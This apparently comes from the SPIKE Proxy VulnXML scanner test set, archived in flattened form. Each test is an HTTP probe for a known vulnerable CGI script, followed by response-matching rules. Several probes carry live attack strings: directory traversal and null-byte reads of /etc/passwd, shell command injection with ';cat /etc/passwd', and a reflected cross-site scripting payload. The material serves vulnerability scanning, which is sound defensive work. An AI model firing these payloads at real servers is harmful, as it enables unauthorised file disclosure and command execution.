0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.wwwacl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1230.xml0100664000076500007650000000712007566204543021732 0ustar davedave (Upload.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}Upload.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1231.xml0100664000076500007650000000735207566204543021742 0ustar davedave (ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd) "This CGI allows attackers to read arbitrary files remotely. CAN-2001-0466." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1232.xml0100664000076500007650000000731407566204543021741 0ustar davedave (ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd) "ustorekeeper will display arbitrary files. CAN-2001-0466" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1233.xml0100664000076500007650000000707507566204543021746 0ustar davedave (view-source) "This may allow remote arbitrary file retrieval." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}view-source HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1234.xml0100664000076500007650000000712307566204543021741 0ustar davedave (view-source?view-source) "This allows remote users to view source code." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}view-source?view-source HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1235.xml0100664000076500007650000000705207566204543021743 0ustar davedave (viewlogs.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}viewlogs.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1236.xml0100664000076500007650000000717007566204543021745 0ustar davedave (viewsource?/etc/passwd) "Allows attacker to retrieve arbitrary files. Remove from CGI directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}viewsource?/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1237.xml0100664000076500007650000000725207566204543021747 0ustar davedave (view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00) "This CGI allows reading of remote files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1238.xml0100664000076500007650000000714307566204543021747 0ustar davedave (visadmin.exe) "This CGI allows attacker to crash the web server. Remove it from the CGI directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}visadmin.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1239.xml0100664000076500007650000000704307566204543021747 0ustar davedave (visitor.exe) "May be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}visitor.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-123.xml0100664000076500007650000000705207566204543021656 0ustar davedave (.www_acl) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.www_acl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1240.xml0100664000076500007650000000713607566204543021742 0ustar davedave (vote.cgi) "Mike's Vote CGI contained a bug which allowed arbitrary command exectution (version 1.2) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}vote.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1241.xml0100664000076500007650000000745107566204543021743 0ustar davedave (vq/demos/respond.pl?<script>alert('Vulnerable')</script>) "vqServer default CGI files are vulnerable to Cross Site Scripting (XSS) 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}vq/demos/respond.pl?<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1242.xml0100664000076500007650000000730107566204543021736 0ustar davedave (VsSetCookie.exe?) "A flaw in VsSetCookie.exe may allow attackers to guess a correct user name & gain access to the Lucent system. See http://www.securityfocus.com for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}VsSetCookie.exe? HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1243.xml0100664000076500007650000000704207566204543021741 0ustar davedave (w3-msql) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}w3-msql HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1244.xml0100664000076500007650000000704007566204543021740 0ustar davedave (w3-sql) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}w3-sql HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1245.xml0100664000076500007650000000717307566204543021750 0ustar davedave (way-board.cgi?db=/etc/passwd%00) "Allows attackers to read arbitrary files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}way-board.cgi?db=/etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1246.xml0100664000076500007650000000721707566204543021750 0ustar davedave (way-board/way-board.cgi?db=/etc/passwd%00) "Allows attackers to read arbitrary files from the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1247.xml0100664000076500007650000000712007566204543021742 0ustar davedave (wconsole.dll) "It may be possible to overflow this dll with 1024 bytes of data." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}wconsole.dll HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1248.xml0100664000076500007650000000704007566204543021744 0ustar davedave (webais) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webais HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1249.xml0100664000076500007650000000705007566204543021746 0ustar davedave (webbbs.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webbbs.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-124.xml0100664000076500007650000000714107566204543021656 0ustar davedave (ls) "The CERN server lets attackers view the host's path. Should be upgraded to Apache 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ls HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ neither '/ 200 neither '/ 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1250.xml0100664000076500007650000000704107566204543021736 0ustar davedave (webbbs.exe) "May be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webbbs.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1251.xml0100664000076500007650000000743707566204543021750 0ustar davedave (webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd) "WebBBS by Darryl Burgdorf is vulnerable to command execution." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1252.xml0100664000076500007650000000742307566204543021744 0ustar davedave (webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD) "webcart.cgi allows remote command execution. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1253.xml0100664000076500007650000000720107566204543021737 0ustar davedave (webdist.cgi?distloc=;cat%20/etc/passwd) "This CGI allows attackers to read files remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1254.xml0100664000076500007650000000711507566204543021744 0ustar davedave (webdriver) "This CGI often allows anyone to access the Informix DB on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webdriver HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1255.xml0100664000076500007650000000706707566204543021753 0ustar davedave (webgais) "The webgais allows attackers to execute commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webgais HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1256.xml0100664000076500007650000000721407566204543021746 0ustar davedave (webif.cgi) "HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webif.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1257.xml0100664000076500007650000000737307566204543021755 0ustar davedave (webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00) "EmuMail allows any file to be retrieved from the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1258.xml0100664000076500007650000000705107566204543021747 0ustar davedave (webmap.cgi) "nmap front end...could be fun" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webmap.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1259.xml0100664000076500007650000000722107566204543021747 0ustar davedave (Webnews.exe) "Some versions of WebNews are vulnerable to a buffer overflow. See http://www.nextgenss.com/advisories/netwinnews.txt for more info." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}Webnews.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1260.xml0100664000076500007650000000712007566204543021735 0ustar davedave (webnews.pl) "WebNews may contain some default users in the binary: testweb/newstest 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webnews.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1261.xml0100664000076500007650000000714507566204543021745 0ustar davedave (webplus.exe?about) "Webplus may divulge product information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webplus.exe?about HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Product Information 200 Product Information 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1262.xml0100664000076500007650000000713507566204543021745 0ustar davedave (webplus?about) "Webplus may divulge product information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webplus?about HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Product Information 200 Product Information 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1263.xml0100664000076500007650000000724707566204543021752 0ustar davedave (webplus?script=../../../../../../../../../../etc/passwd) "This CGI allows attackers to retrieve files remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webplus?script=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see 